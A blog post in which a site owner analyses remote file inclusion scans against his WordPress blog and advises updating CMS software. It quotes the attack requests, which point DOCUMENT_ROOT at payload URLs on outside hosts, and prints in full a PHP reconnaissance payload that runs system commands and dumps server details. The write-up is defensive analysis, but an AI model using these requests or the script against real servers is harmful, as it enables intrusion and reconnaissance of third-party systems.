open core »

Malicious web activity

I've noticed that since Friday there has been allot of scanning activity attempts against my blog. Fortunately, they fail. The IP addresses come from a variety of countries like Denmark, Germany, Ukraine, USA and alike, and all seem to come from compromised machines, running Windows 2000, 98 (go figure) and Solaris.

The scanning methods used are interesting. In the logs I can see all sorts of strings sent to a Wordpress PHP variable (?) in order to exploit some kind of remote file inclusion vulnerability.

Here's an example of the requests being made to the server:

DOCUMENT_ROOT=http://bolikowski.com/images/_MD.TXT??
DOCUMENT_ROOT=http://www.pne.de//contenido/includes/cmd.txt??
_SERVER\[DOCUMENT_ROOT\]=http://notonyourradio.com/bresica.gif??
_SERVER\[DOCUMENT_ROOT\]=http://bolikowski.com/images/test.txt???

Well let's have a look at the content of those files:

<?php
function ConvertBytes($number) {
    $len = strlen($number);
	if($len < 4)
		return sprintf("%d b", $number);
	if($len >= 4 && $len <=6)
		return sprintf("%0.2f Kb", $number/1024);
	if($len >= 7 && $len <=9)
		return sprintf("%0.2f Mb", $number/1024/1024);

	return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Script Kiddx0r<br>";
$fast = @php_uname();
$fast2 = system(uptime);
$fast3 = system(id);
$fast4 = @getcwd();
$fast5 = getenv("SERVER_SOFTWARE");
$fast6 = phpversion();
$fast7 = $_SERVER['SERVER_NAME'];
$fast8 = gethostbyname($SERVER_ADDR);
$fast9 = get_current_user();
$fast10= diskfreespace($fast4);
$fast11 = ConvertBytes(diskfreespace($fast4));
if (!$fast11) {$fast11 = 0;}
$all1= disk_total_space($fast4);
$fast12 = ConvertBytes(disk_total_space($fast4));
if (!$fast12) {$fast12 = 0;}
$fast13 = ConvertBytes($all1-$fast10);
$os = @PHP_OS;

echo "Script Kiddx0r<br>";
echo "os: $os<br>";
echo "uname -a: $fast<br>";
echo "uptime: $fast2<br>";
echo "id: $fast3<br>";
echo "pwd: $fast4<br>";
echo "user: $fast9<br>";
echo "phpv: $fast6<br>";
echo "SoftWare: $fast5<br>";
echo "ServerName: $fast7<br>";
echo "ServerAddr: $fast8<br>";
echo "free: $fast11<br>";
echo "used: $fast12<br>";
echo "total: $fast13<br>";
echo "By Script Kiddx0r<br>";
exit;
?>

This PHP code is for information gathering about the server, PHP version, OS version etc... it even has a function to convert the disk space from bytes. There are other variants of the code, you can check them at the URL's. The most interesting thing is that the files used to execute the inclusion are in various formats, like txt and gif, pretending to be an image, but it's just a PHP file with a .gif extension. Another fact is that most of the websites hosting this files are compromised in a way that the owner doesn't even notices.

It seems that there's allot of scanning going on websites (I'm getting nearly 3 scans attempts per hour, but I haven't found a reason for it, there's no recent disclosure about a related vulnerability. So I'll keep searching for some clues about this. Be aware of your blog's activity, and update every CMS and plugins in use to the latest version.